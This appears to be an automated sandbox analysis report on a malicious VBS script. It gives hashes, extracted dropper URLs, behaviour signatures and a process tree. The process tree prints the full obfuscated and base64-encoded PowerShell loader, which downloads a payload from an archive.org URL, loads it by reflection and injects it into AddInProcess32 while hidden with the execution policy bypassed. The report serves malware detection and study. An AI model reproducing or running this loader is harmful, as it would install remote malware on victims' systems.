Overview

overview

10

Static

static

1

c7f2358c6d...84.vbs

windows7-x64

10

c7f2358c6d...84.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    78s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    02-10-2024 03:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c7f2358c6d043c69480de7d6bcffb1fc6c6467e21e5b3be0c84b6274d03ba284.vbs

  • Size

    491KB

  • MD5

    8619103fa6e661049111f4bbdd7fe0d2

  • SHA1

    ca586ed66ab95510af2af9fb380575e885f3c6eb

  • SHA256

    c7f2358c6d043c69480de7d6bcffb1fc6c6467e21e5b3be0c84b6274d03ba284

  • SHA512

    d649b396c6e3dcb8fa0517a9a157a17f8842e9c0899510ced40c04d557b3d3ea0dbd70a1236fff519ebbe9ea9c64426cbc8ae048b98995e51c501eed48896d2b

  • SSDEEP

    12288:NNjXVkBaQoLDBqKKcoXOZzIWPkETDuQnL3Qu5toTmP18cEuL9M7y8q8+01SB0WKg:y4cUteD9aS4Bh

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c7f2358c6d043c69480de7d6bcffb1fc6c6467e21e5b3be0c84b6274d03ba284.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzVFJJTmddJFZlUmJvU2VwUmVGRVJFbkNlKVsxLDNdKyd4Jy1qb0lOJycpICggKCdadFMnKyd1cmwgPSAnKyduY2EnKydodHQnKydwczovJysnL2lhNicrJzAnKycwMTAwLnVzLmFyY2hpJysndmUuJysnbycrJ3JnJysnLzInKyc0L2l0ZW1zJysnLycrJ2RldGEnKydoLW5vJysndGUtdi9EJysnZXRhaE4nKydvdGVWLnR4dG4nKydjYTtadFNiYXMnKydlJysnNjRDb250ZScrJ250ICcrJz0gJysnKCcrJ05ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQpLkRvd24nKydsJysnb2FkUycrJ3RyaScrJ25nKFp0U3VybCcrJyk7WicrJ3QnKydTJysnYmluJysnYXJ5Q29udGVudCA9JysnIFtTeScrJ3N0ZScrJ20uQ29udmUnKydyJysndCcrJ106JysnOkYnKydyb21CYXNlNjRTdHJpJysnbmcoWicrJ3RTYmEnKydzZTY0Q29udGVudCk7JysnWicrJ3RTJysnYXNzZW1ibHkgPScrJyBbUicrJ2VmbGVjdGlvbi5BJysnc3NlbWJseV0nKyc6OkwnKydvYWQoJysnWnRTYicrJ2knKyduJysnYXJ5Q29udGVudCcrJyk7WnRTdHlwZSA9IFp0U2FzJysnc2UnKydtYmx5LicrJ0dldFR5cGUoJysnbicrJ2NhUnVuUEUuJysnSG9tZW5jJysnYSk7WnRTbScrJ2V0aG9kID0gWicrJ3RTdHlwJysnZScrJy5HZXRNJysnZScrJ3RoJysnb2QobmNhVicrJ0FJbmNhJysnKTtadFNtZXQnKydobycrJ2QuSW52Jysnb2tlKFp0U24nKyd1bGwsJysnIFtvYmonKydlY3RbXV1AKCcrJ25jYXR4dC55bGQnKydyZm9jZS92ZWQuMnIuZDQzOCcrJ2Y3MTU1Y2M2ZScrJ2VhOTJkJysnMScrJzRlNicrJzAnKyc3NycrJzMnKyc3MjgnKycxYzQtYicrJ3UnKydwLy86Jysnc3AnKyd0dGhuYycrJ2EnKycgLCBuY2FkJysnZXNhdCcrJ2l2YWRvbmNhICwgJysnbmNhZCcrJ2VzYXRpJysndmFkb24nKydjYSAsJysnICcrJ25jYWRlc2EnKyd0aXZhZG8nKyduJysnY2EnKycsbmNhQScrJ2RkSW4nKydQcm9jZXNzMzJuJysnYycrJ2EsJysnbmNhJysnbmNhKSknKS5SZVBsQWNlKCduY2EnLFtTVFJJTmddW0NIYVJdMzkpLlJlUGxBY2UoJ1p0UycsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([sTRINg]$VeRboSepReFEREnCe)[1,3]+'x'-joIN'') ( ('ZtS'+'url = '+'nca'+'htt'+'ps:/'+'/ia6'+'0'+'0100.us.archi'+'ve.'+'o'+'rg'+'/2'+'4/items'+'/'+'deta'+'h-no'+'te-v/D'+'etahN'+'oteV.txtn'+'ca;ZtSbas'+'e'+'64Conte'+'nt '+'= '+'('+'New-Object Sy'+'stem.Net.WebClient).Down'+'l'+'oadS'+'tri'+'ng(ZtSurl'+');Z'+'t'+'S'+'bin'+'aryContent ='+' [Sy'+'ste'+'m.Conve'+'r'+'t'+']:'+':F'+'romBase64Stri'+'ng(Z'+'tSba'+'se64Content);'+'Z'+'tS'+'assembly ='+' [R'+'eflection.A'+'ssembly]'+'::L'+'oad('+'ZtSb'+'i'+'n'+'aryContent'+');ZtStype = ZtSas'+'se'+'mbly.'+'GetType('+'n'+'caRunPE.'+'Homenc'+'a);ZtSm'+'ethod = Z'+'tStyp'+'e'+'.GetM'+'e'+'th'+'od(ncaV'+'AInca'+');ZtSmet'+'ho'+'d.Inv'+'oke(ZtSn'+'ull,'+' [obj'+'ect[]]@('+'ncatxt.yld'+'rfoce/ved.2r.d438'+'f7155cc6e'+'ea92d'+'1'+'4e6'+'0'+'77'+'3'+'728'+'1c4-b'+'u'+'p//:'+'sp'+'tthnc'+'a'+' , ncad'+'esat'+'ivadonca , '+'ncad'+'esati'+'vadon'+'ca ,'+' '+'ncadesa'+'tivado'+'n'+'ca'+',ncaA'+'ddIn'+'Process32n'+'c'+'a,'+'nca'+'nca))').RePlAce('nca',[STRINg][CHaR]39).RePlAce('ZtS','$') )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2924

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    b9a6f8c8ffccbeba2b2b47b67c15fb79

    SHA1

    0f6a61b591963ccd6ad406664fa071a006ff8673

    SHA256

    a0c55d30eb5b8ce3392c9d6ba8c4cac8d8aefce0cbfffc044288f2f5cfff4e50

    SHA512

    88093f80e8fef38c6f049f6cb5720f918d2d8296d5bd4bb423678277923a44e39884feb728ca605d64001ed9749bfc76b267f1c5f2dd1cb453c3c6b07a7604b9

    Download Submit

  • memory/2708-4-0x000007FEF490E000-0x000007FEF490F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2708-5-0x000007FEF4650000-0x000007FEF4FED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-6-0x000007FEF4650000-0x000007FEF4FED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-7-0x000000001B280000-0x000000001B562000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2708-8-0x000007FEF4650000-0x000007FEF4FED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-9-0x00000000025E0000-0x00000000025E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2708-10-0x000007FEF4650000-0x000007FEF4FED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-16-0x000007FEF4650000-0x000007FEF4FED000-memory.dmp

    Filesize

    9.6MB

    Download